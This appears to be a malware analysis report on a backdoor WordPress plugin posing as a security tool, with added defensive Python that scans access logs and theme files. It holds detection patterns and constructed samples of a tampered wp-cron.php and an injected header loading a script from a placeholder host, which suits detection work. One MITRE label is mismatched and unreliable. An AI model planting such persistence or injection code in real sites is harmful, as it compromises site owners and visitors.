Full Report
A new malware campaign targeting WordPress sites employs a malicious plugin disguised as a security tool to trick users into installing and trusting it. [...]
Analysis Summary
# Tool/Technique: WordPress Backdoor Plugin
## Overview
A malicious WordPress plugin disguised as a legitimate security or performance tool, designed to establish persistence, grant administrator access to threat actors, and execute arbitrary code on compromised websites.
## Technical Details
- Type: Malware (Backdoor Trojan specifically packaged as a WordPress plugin)
- Platform: WordPress / PHP environments
- Capabilities: Persistence via file recreation, backdoor access via emergency login mechanism, remote code execution via REST API endpoint, and potential JavaScript injection for visitor compromise.
- First Seen: Discovered in late January 2025 by Wordfence.
## MITRE ATT&CK Mapping
The behavior described maps to several defensive evasion and persistence techniques:
- **TA0003 - Persistence**
  - T1556.002 - Modify System Image: Plugin re-creation via `wp-cron.php`.
- **TA0005 - Defense Evasion**
  - T1070.004 - Indicator Removal: File Deletion (Attempted, but promptly reversed by the malware).
- **TA0011 - Command and Control**
  - T1105 - Ingress Tool Transfer: The plugin acts as the initial access point and persistence layer for C2 communication.
- **TA0002 - Execution**
  - T1059.005 - Command and Scripting Interpreter: PHP execution via theme files and REST API.
## Functionality
### Core Capabilities
- **Persistence:** If the malicious plugin is deleted, the modified `wp-cron.php` file automatically re-creates and reactivates it upon the next site visit.
- **Backdoor Access:** Provides immediate administrator access using the function `emergency_login_all_admins` triggered by the `emergency_login` GET parameter, logging in as the first existing administrator user if the correct cleartext password is provided.
- **File Manipulation/Execution:** Registers an unauthenticated custom REST API route allowing for the insertion of arbitrary PHP code into all active theme `header.php` files.
### Advanced Features
- **Cache Clearing:** Ability to clear plugin caches.
- **Visitor Compromise (Potential):** An updated version can inject base64-decoded JavaScript into the site's `<head>` section, potentially for phishing, spam distribution, or redirecting visitors.
## Indicators of Compromise
- File Hashes: [Not provided in the article]
- File Names:
  - Malicious Plugin Name: `WP-antymalwary-bot.php`
  - Other observed plugin names: `addons.php`, `wpconsole.php`, `wp-performance-booster.php`, `scr.php`
  - Modified File: `wp-cron.php`
  - Target for Code Injection: Theme `header.php` files.
- Registry Keys: [Not applicable for WordPress file system malware]
- Network Indicators:
  - C2 Server Location: Cyprus (Specific IPs/Domains not provided).
- Behavioral Indicators:
  - Modification of `wp-cron.php` to programmatically activate a malicious plugin.
  - Access log entries containing `emergency_login`, `check_plugin`, `urlchange`, and `key`.
  - Unexpected PHP code injection within theme `header.php` files.
## Associated Threat Actors
- Not explicitly named/attributed, but observed by Wordfence. Researchers noted traits similar to a June 2024 supply chain attack involving WordPress plugins.
## Detection Methods
- Signature-based detection: Searching for the presence of the specific malicious plugin files (`WP-antymalwary-bot.php`, etc.).
- Behavioral detection: Monitoring filesystem changes, specifically modifications to `wp-cron.php` and theme `header.php` files. Monitoring for HTTP requests containing the `emergency_login` GET parameter.
- YARA rules if available: [Not specifically mentioned in the article]
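The two detection approaches above, as an added example that is not part of the original report or Wordfence's tooling: it flags web-server access-log requests carrying the GET parameters the report lists, and matches plugin file names against the observed malicious names. The log lines and plugin paths are constructed samples; the choice to treat `key` as a weak indicator (flagged only alongside one of the other parameters, since `key` is a common legitimate parameter name) is an assumption made here, not something the report states.

```python
"""Added example: detect the backdoor's request parameters in access logs and
list plugin files whose names match the ones the report observed.
Sample data below is constructed for the example."""
import re
from pathlib import PurePosixPath
from urllib.parse import parse_qs, urlsplit

# GET parameters the report associates with the malicious plugin's request handling.
STRONG_PARAMS = {"emergency_login", "check_plugin", "urlchange"}
WEAK_PARAMS = {"key"}  # assumption: too generic to flag on its own

# Plugin file names observed in the campaign, as listed in the report.
# Generic names such as addons.php need manual confirmation after a hit.
MALICIOUS_PLUGIN_NAMES = {
    "WP-antymalwary-bot.php", "addons.php", "wpconsole.php",
    "wp-performance-booster.php", "scr.php",
}

# Apache/nginx combined log format: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def suspicious_requests(log_lines):
    """Return one dict per request whose query string carries a strong indicator
    parameter; weak parameters are reported only when they co-occur with one."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        parts = urlsplit(m["target"])
        params = set(parse_qs(parts.query, keep_blank_values=True))
        if not (params & STRONG_PARAMS):
            continue
        hits.append({
            "ip": m["ip"],
            "time": m["time"],
            "path": parts.path,
            "params": sorted(params & (STRONG_PARAMS | WEAK_PARAMS)),
        })
    return hits


def malicious_plugin_files(plugin_paths):
    """Given paths relative to wp-content/plugins (e.g. from os.walk), return the
    ones whose file name matches an observed malicious plugin name."""
    return sorted(p for p in plugin_paths
                  if PurePosixPath(p).name in MALICIOUS_PLUGIN_NAMES)


# Constructed sample log: one backdoor login attempt, one plugin check with a key,
# one benign request, and one benign request that only uses a generic 'key' param.
SAMPLE_LOG = """\
203.0.113.5 - - [29/Jan/2025:10:15:02 +0000] "GET /?emergency_login=placeholder HTTP/1.1" 302 0
203.0.113.5 - - [29/Jan/2025:10:15:09 +0000] "GET /wp-admin/ HTTP/1.1" 200 512
198.51.100.7 - - [29/Jan/2025:10:16:40 +0000] "POST /wp-cron.php?check_plugin=1&key=abc HTTP/1.1" 200 0
192.0.2.9 - - [29/Jan/2025:10:17:01 +0000] "GET /blog/?key=newsletter HTTP/1.1" 200 8192
""".splitlines()

# Constructed sample plugin directory listing (relative to wp-content/plugins).
SAMPLE_PLUGIN_PATHS = [
    "akismet/akismet.php",
    "WP-antymalwary-bot.php",
    "wp-performance-booster/wp-performance-booster.php",
    "woocommerce/woocommerce.php",
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print("suspicious request:", hit)
    for path in malicious_plugin_files(SAMPLE_PLUGIN_PATHS):
        print("known malicious plugin name:", path)
```

Run it over a real access log with `suspicious_requests(open(path))` and over `os.walk` output of `wp-content/plugins`; a hit on `emergency_login` is worth an immediate administrator-account review, while name matches should be confirmed by inspecting the file before removal.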
## Mitigation Strategies
- Restore `wp-cron.php` to its original, uncompromised state.
- Delete the malicious plugin files.
- Scrutinize all theme `header.php` files for injected JavaScript or PHP code.
- Review user accounts and immediately change all administrator passwords.
- Investigate hosting account security if FTP or hosting credentials are suspected of being compromised.
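The first three steps above, as an added example that is not part of the original report: it checks `wp-cron.php` against the hash of a pristine copy and for function calls a stock `wp-cron.php` does not make, then scans a theme `header.php` for the kinds of injected PHP and JavaScript the report describes. The known-good hash is a placeholder to be taken from an untouched WordPress release of the same version; the marker and pattern lists, and the sample file contents, are constructed for this example.

```python
"""Added example: integrity check for wp-cron.php and injection scan for
theme header.php files. Samples and pattern lists are constructed here."""
import hashlib
import re

# Placeholder: replace with the SHA-256 of wp-cron.php from a pristine copy
# of the exact WordPress version in use.
KNOWN_GOOD_WP_CRON_SHA256 = "<sha256 of pristine wp-cron.php>"

# Calls the stock wp-cron.php never makes; the report describes the modified
# file re-creating and reactivating the plugin, which needs exactly these.
WP_CRON_MARKERS = ("activate_plugin", "file_put_contents", "base64_decode", "eval(")

# Patterns for injected code in header.php. A legitimate header.php contains
# PHP (wp_head(), language_attributes()), so PHP tags alone are not flagged.
INJECTION_PATTERNS = [
    ("eval-call", re.compile(r"\beval\s*\(", re.I)),
    ("php-obfuscation", re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    ("js-base64-decode", re.compile(r"<script[^>]*>[^<]*\batob\s*\(", re.I | re.S)),
    ("js-long-base64-literal", re.compile(r"<script[^>]*>[^<]*['\"][A-Za-z0-9+/=]{80,}['\"]", re.I | re.S)),
]


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def wp_cron_findings(content: bytes, known_good_sha256: str = KNOWN_GOOD_WP_CRON_SHA256):
    """Return a list of findings: 'hash-mismatch' if the file differs from the
    pristine copy, plus 'marker:<name>' for each suspicious call present."""
    findings = []
    if sha256_hex(content) != known_good_sha256:
        findings.append("hash-mismatch")
    text = content.decode("utf-8", errors="replace")
    findings.extend(f"marker:{m}" for m in WP_CRON_MARKERS if m in text)
    return findings


def header_php_findings(content: str):
    """Return the names of injection patterns that match the file content."""
    return [name for name, rx in INJECTION_PATTERNS if rx.search(content)]


# Constructed stand-in for a clean wp-cron.php (not the real file's contents).
CLEAN_WP_CRON_SAMPLE = b"<?php\nrequire_once ABSPATH . 'wp-load.php';\nwp_cron();\n"
# Constructed tampered version with the re-creation logic the report describes.
TAMPERED_WP_CRON_SAMPLE = (
    b"<?php\nrequire_once ABSPATH . 'wp-load.php';\n"
    b"if (!file_exists(WP_PLUGIN_DIR . '/WP-antymalwary-bot.php')) {\n"
    b"    file_put_contents(WP_PLUGIN_DIR . '/WP-antymalwary-bot.php', $src);\n"
    b"    activate_plugin('WP-antymalwary-bot.php');\n}\nwp_cron();\n"
)

CLEAN_HEADER_SAMPLE = (
    "<!DOCTYPE html><html <?php language_attributes(); ?>>"
    "<head><?php wp_head(); ?></head>"
)
# Constructed injected header: obfuscated PHP before the markup and a script
# that builds a loader URL from a base64 string (decodes to a placeholder URL).
INJECTED_HEADER_SAMPLE = (
    "<?php eval(base64_decode('ZWNobyAnaGknOw==')); ?>\n"
    "<!DOCTYPE html><html><head><?php wp_head(); ?>\n"
    "<script>document.head.appendChild(document.createElement('script')).src="
    "atob('aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvbG9hZGVyLmpz');</script>\n</head>"
)

if __name__ == "__main__":
    baseline = sha256_hex(CLEAN_WP_CRON_SAMPLE)
    print("tampered wp-cron.php:", wp_cron_findings(TAMPERED_WP_CRON_SAMPLE, baseline))
    print("injected header.php:", header_php_findings(INJECTED_HEADER_SAMPLE))
```

In practice, run `wp_cron_findings` on every copy of `wp-cron.php` and `header_php_findings` on `wp-content/themes/*/header.php`; a hash mismatch with no marker hit still means the file should be replaced from the pristine release, since the report's mitigation is restoration rather than cleaning in place.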
## Related Tools/Techniques
- The persistence mechanism relies on abusing the legitimate WordPress functionality of `wp-cron.php`.
- Similar malware seen in the June 2024 WordPress plugin supply chain attack.